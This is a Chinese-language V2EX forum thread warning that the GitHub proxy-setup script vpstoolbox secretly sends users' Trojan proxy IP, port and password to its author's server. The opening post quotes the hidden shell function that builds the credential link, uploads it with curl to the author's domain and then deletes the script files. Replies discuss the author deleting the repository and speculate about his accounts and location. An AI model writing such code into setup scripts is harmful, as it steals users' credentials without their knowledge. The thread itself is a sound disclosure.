Github 间谍项目 vpstoolbox，避雷，有用的小伙伴记得改密码

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

通过以下 Referral 链接购买 DigitalOcean 主机，你将可以帮助 V2EX 持续发展

› DigitalOcean - SSD Cloud Servers

这是一个创建于 602 天前的主题，其中的信息可能已经有所发展或是发生改变。

仓库:https://github.com/johnrosen1/vpstoolbox/blob/master/vps.sh

会把机场的 IP ，端口，密码上传到作者可控的服务器，后续想干嘛就不知道了

https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494

clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}

第 1 条附言 · 2023-03-30 12:30:17 +08:00

https://cn.tgstat.com/channel/@vpstoolbox

难道是

86 条回复 • 2023-04-05 21:00:46 +08:00

buyan3303

2023-03-30 10:37:12 +08:00

[机场的 IP ，端口，密码上传到作者可控的服务器]
通常自己免费使用这些机场

proxytoworld

2023-03-30 10:39:06 +08:00

@buyan3303 也有可能转卖，谁知道呢

Greenm

2023-03-30 11:02:38 +08:00

不管出于什么目的，我已经提交 report 给 github 了。

vsitebon

2023-03-30 11:19:02 +08:00

太特么溜了

Andim

2023-03-30 11:37:50 +08:00 via iPhone

还是 1000 以上的关注项目呀

arfaWong

2023-03-30 11:39:45 +08:00

之前就有人发现发了 issue ，然后作者把 issue 给关了😂

jomalonejia

2023-03-30 11:47:13 +08:00

关注后续

csrocks

2023-03-30 11:48:38 +08:00

已经删库了😂

aogg

2023-03-30 11:49:06 +08:00

已经打不开 github 项目了

lzgshsj

2023-03-30 11:49:36 +08:00

不开 issue 的的仓库，多少有点这那毛病

Rache1

2023-03-30 11:53:42 +08:00

还有 1.4k 的 star

https://web.archive.org/web/20230330025849/https://github.com/johnrosen1/vpstoolbox

Rache1

2023-03-30 11:55:32 +08:00

在这个 issue 发出来的时候，还有 1.6k star 😄

为什么 trojan 订阅地址包括用户密码等要上传到个人博客？ · Issue #138 · johnrosen1/vpstoolbox · GitHub
https://web.archive.org/web/20221128070511/https://github.com/johnrosen1/vpstoolbox/issues/138

vsitebon

2023-03-30 11:56:00 +08:00

已经删号和删库了

iyiluo

2023-03-30 11:56:22 +08:00

跑路了，估计好一大波肉鸡

lakehylia

2023-03-30 11:56:48 +08:00

这是真正的删库跑路吧。。。

vsitebon

2023-03-30 11:59:13 +08:00

该开发者在 v 站： https://www.v2ex.com/member/johnrosen1

leaflxh

2023-03-30 12:00:49 +08:00

曾经有一次把 get.docker.com 记错了，打成了 get-docker.sh 。用一键脚本感觉像是在裸奔

leaflxh

2023-03-30 12:02:15 +08:00

#!/bin/bash
while [ 1 ]
do
echo " ______________ ______ ___ ________ "
echo " .\\\\ _ _ /----/ /_____/ \\\\\\. /_ "
echo " )__/ /___\\ _/ // / // /___(__ "
echo " / // \\ // / // /_\\ \\ "
echo " /_____\\ /_____\\ _________\\ _______ \\ "
echo " ////////\\_____///////\\\\/////////\\\\///////\\_____//. "
echo " _________ ___________ ________ _______ ________ "
echo " _) /_.) ._ // ___ // /_____\\____ ( "
echo " \\ |__/ \\__ |/ _// / / / X0 / \\ "
echo " \\ : / / \\__ / //_ /\\ /. / \\ "
echo " .\\\\___ /___\\ /_____////____/\\ \\\\__ / "
echo " ////\\____//////\\____/////// ////////\\____////\\____//. "
echo " ///// ///// ///// ///// "
echo ""
echo " WHY YOU NO LOOK AT THE SOURCE BEFORE YOU PIPE INTO BASH??"
echo ""
echo " #AirGap2020 Virtual Conference May 2nd! https://airgapp.in"
echo " Follow @airgappin on Twitter for updates!"
echo ""
done

cookcode

2023-03-30 12:19:59 +08:00 via Android

看了一眼，开发这个的老哥在 v2 也宣传过

wdv2ly

2023-03-30 12:20:11 +08:00 via Android

@vsitebon 哈哈，估计作者一看到 v 站小伙伴曝光，立马删库跑路😂

iijboom

2023-03-30 12:20:23 +08:00

https://github.com/laoz77/trojan-gfw-script
这个应该是他的大号
打开可以看到他的网址，建议大家一起一锅端举报了
trojan-gfw-script
This script will help you set up a trojan-gfw server in an extremely fast way. https://www.johnrosen1.com/trojan/ main course Auto install and setup Trojan-Gfw and nginx. Auto enable tcp-bbr and disable tcp slow start

proxytoworld

2023-03-30 12:23:01 +08:00

@vsitebon #16 牛逼，这样的开发能封了吗，这脚本还是 root 权限

proxytoworld

2023-03-30 12:23:57 +08:00

@arfaWong
@lzgshsj

确实不开 issue 一眼有问题

proxytoworld

2023-03-30 12:25:47 +08:00

博客也暂时关了

Death

2023-03-30 12:26:39 +08:00

一键脚本应该尽量默认是有问题的
哪怕是官方提供的安装脚本也要自己过一遍才能放心

iijboom

2023-03-30 12:27:32 +08:00

https://github.com/johnwick3gits/trojan-gfw-script 小号加 1
This branch is 1211 commits ahead of laoz77:master.
下面也有他的信息
Telegram Channel And Group
https://t.me/johnrosen1
https://t.me/trojanscript
中文文檔

FranzKafka95

2023-03-30 12:29:54 +08:00 via Android

不开 ISSUE 区其实已经很能说明问题了。

LeegoYih

2023-03-30 12:30:12 +08:00

@iijboom #26
这么多小号？看来是惯犯了，怕不是灰产。

iijboom

2023-03-30 12:32:51 +08:00

@LeegoYih 估计还有很多，没空找

404www

2023-03-30 12:33:04 +08:00

哈哈，连博客也删解析了

proxytoworld

2023-03-30 12:34:13 +08:00

@LeegoYih #28 有可能是抓下来在卖，如果自己用，这样大批量的也用不着

huoshanhui

2023-03-30 12:50:21 +08:00

把这祸害弄进去

mnsw

2023-03-30 12:50:36 +08:00

啊这，以前好像还有群的。

lambdaq

2023-03-30 13:38:55 +08:00

一来可以自己卖赚钱

二来可以怼人举报一波，把线索卖个晶哥简单立个功

XSNARUTO

2023-03-30 13:54:11 +08:00

从来不推荐任何小白用什么一件脚本，反正现在便宜机场一大堆，我甚至会觉得随便给小白丢什么「一键脚本」的人都不是什么太负责的人。真的有需求的人，要么会自己搭（毕竟也不难），要么多少懂一点起码的 review 脚本代码。

想起来之前逛 Twitter 看到有小白（而且说了自己不是数码 /科技爱好者）询问数据存储意见，很简单的就买现成云存储的需求，结果也是有人上来就让人家去买 NAS 。我真的无大语，总有人喜欢放个屁，然后跑得无影无踪……。

rock123

2023-03-30 14:23:48 +08:00

这个是不是小号？ https://github.com/haakuya/Qbit_tools

Greenm

2023-03-30 14:35:40 +08:00

https://t.me/vpstoolbox/2 他尝到了甜头，重新搞了个小号打复活赛了

Greenm

2023-03-30 14:52:36 +08:00

https://github.com/ghost 这个账号应该才是他的大号，隐藏了 activity

jenlors

2023-03-30 14:56:20 +08:00

这种人就是败类

proxytoworld

2023-03-30 14:58:26 +08:00

@Greenm 咋查到大号的，牛啊

AkaGhost

2023-03-30 15:00:13 +08:00 via Android

ghost 是个特殊用户，代表那个用户已经注销了

xiri

2023-03-30 15:26:06 +08:00 via Android

@Greenm ghost 是 github 的删号占位账户，，，

joesonw

2023-03-30 16:02:36 +08:00 via iPhone

域名用了 privacy guardian ，一起去举报 abuse 披露注册信息，不知有没有用。

crab

2023-03-30 16:10:23 +08:00

@arfaWong 提出问题，解决提问人。

jockielee

2023-03-30 16:50:00 +08:00

《你用我脚本，我用你代理》🤣

Jeanslike

2023-03-30 16:59:56 +08:00

确实是个败类

Cu635

2023-03-30 17:08:26 +08:00

@vsitebon #16
难怪反应这么快，lz 发帖不到 5 个小时就连着帐号一起删了。

BigShot404

2023-03-30 17:17:04 +08:00

说到这个，现在用 OPENAI ，扫一遍代码然后标注一些疑似账号泄露或者后门地址应该不难吧？

20160409

2023-03-30 17:18:49 +08:00

233boy 的这个一键脚本有问题吗，有没人审查过？

https://github.com/233boy/v2ray/wiki

0x535

2023-03-30 17:40:32 +08:00

580 个 fork 都没发现这个问题 😂 fork 了个寂寞

DeltaC

2023-03-30 17:50:48 +08:00

致富门路+1

HaneRo

2023-03-30 18:06:37 +08:00 via Android

rm -rf /root/*.sh ？删除 root 下所有 sh 文件？这是不是不太好

FightPig

2023-03-30 19:32:57 +08:00

删的动作挺快

oszlso

2023-03-30 21:43:51 +08:00

作者 @johnrosen1 今日活跃度排名 9187 ，上线咋不吱声呀🤭

boris1993Jr

2023-03-31 00:35:09 +08:00 via iPhone

@0x535 #50 我感觉大部分人都是拿 fork 当收藏用的，因为小白喜欢这么玩，而用一键脚本的又有不少小白

FrankAdler

2023-03-31 00:42:33 +08:00

https://github.com/Doutianbao/vpstoolbox 相关的 fork 还能找到

n18255447846

2023-03-31 03:22:10 +08:00

事实证明就算有大量使用的人甚至官方的脚本 or 程序，还是有一定的风险。就看懂行的有没有人爆出来了

ttyhtg

2023-03-31 07:26:26 +08:00

能不能把他扒个底朝天，把他送进去？

levelworm

2023-03-31 08:20:44 +08:00

看了下文中的语气，感觉不太像是大陆人？但是的确又是简体字。

比如这个：操作系统不支援，请使用 Debian 或者 Ubuntu 运行。

像我这种 shell 小白真是大开眼界啊，能学不少东西，希望大家能抓到这个人。

CodeCodeStudy

2023-03-31 09:43:09 +08:00

@levelworm 应该是湾湾用简体字，然后搞肉鸡

woyao

2023-03-31 09:43:41 +08:00

@livid 恶意的人在 V2EX 做恶

proxytoworld

2023-03-31 09:45:59 +08:00

@levelworm #59 合理了

wohccdaa

2023-03-31 09:48:56 +08:00 via iPhone

@livid 可以封掉他的账号吗？@johnrosen1

woyao

2023-03-31 09:53:15 +08:00

有使用过这些 docker 的人也小心一点吧
https://hub.docker[.]com/r/johnrosen/nzbget/tags

Vindroid

2023-03-31 10:04:11 +08:00

灯下黑，很多人一看是开源的，还那么多星星，那就不看源码，一把梭哈。一键脚本我是从来不敢直接用的

AlphaTauriHonda

2023-03-31 10:04:52 +08:00 via iPhone

实在是离谱。
是🧱难以封光代理所以主动发布间谍项目？
还是 johnrosen1 想倒卖代理获利？

jklove123bai

2023-03-31 10:13:37 +08:00

所以那些相信开源没事的人的逻辑，我很难理解

lxiian

2023-03-31 11:05:44 +08:00 via iPhone

@levelworm 湾湾喜欢用"支援"而不是"支持"

woyao

2023-03-31 11:14:04 +08:00

@CodeCodeStudy 应该不是湾湾
他的域名 jiesen[.]life 和 johnrosen1[.]com ，看了一下解析 IP ，有不少上海电信的 IP 。应该是在上海。

ICU

2023-03-31 11:18:46 +08:00

哈哈楼主这个发现，还上了这里的新闻（ https://www.oschina.net/news/234764 ）

woyao

2023-03-31 11:21:03 +08:00

不是湾湾的证据还可以看这篇文章

Ledger Nano X 开箱记录及上手体验
https://johnrosen1[.]com/2021/06/02/ledger/

leeuu

2023-03-31 12:56:26 +08:00 via iPhone

开盒了

Shura

2023-03-31 15:40:35 +08:00

真是败类，没有人品

levelworm

2023-03-31 16:33:19 +08:00 via Android

@lxiian 看 69 楼，也不好确定了。另外注释里其他的中文看起来又比较像大陆这边的，不知道坛贤们能不能挖出来更多的。

levelworm

2023-03-31 16:51:19 +08:00 via Android

@woyao 但是这里又很像
https://web.archive.org/web/20230320194653/https://johnrosen1.com/2021/03/06/win10-store/

lovedebug

2023-03-31 16:57:33 +08:00

繁体字“支援”默认不会翻译成“支持”

mypchas6fans

2023-03-31 17:12:08 +08:00

@20160409 之前说有挖矿传言，但我一直在用，只能说看上去没问题，vps cpu 内存流量都正常

Jakarta

2023-03-31 20:03:41 +08:00 via Android

我感觉像是居住在大陆的台湾人。

Jakarta

2023-03-31 20:17:08 +08:00 via Android

johnrosen.xyz 也是他的，还搭建了邮件服务器，邮箱是 john 艾特 johnrosen.xyz

kebamt

2023-03-31 23:19:07 +08:00 via iPhone

@mypchas6fans 没出现过问题，都正常，只是脚本会自动给你做决定服务器层面屏蔽掉一些网站，如：大纪元😂

mcone

2023-04-01 21:07:40 +08:00

前两天看到帖子，这两天无聊搜下了，跟楼上某位朋友的结论有点像，应该是个肉身在大陆的台湾人或者被港台语法深刻浸染过的大陆人。

love2wind

2023-04-02 18:23:38 +08:00

慎用一键脚本啊，谁知道有没有夹带私货

luoshengdu

2023-04-02 22:32:17 +08:00

我擦，我用了好多年了啊

mypchas6fans

2023-04-03 08:49:19 +08:00

@kebamt 嗯，这个看生成的 config.json 就知道，有必要。

zlhsvc

2023-04-03 10:44:58 +08:00

还真没有去翻一键脚本的习惯，下次看来得多注意了

zzyphp111

2023-04-05 21:00:46 +08:00

@20160409 #49 看下油管有 up 曝光这个 233boy ，几年前给 zf 部署，用过还行。

[科学上网] 233boy 版 v2ray 到底有没有后门？看完视频你就知道答案了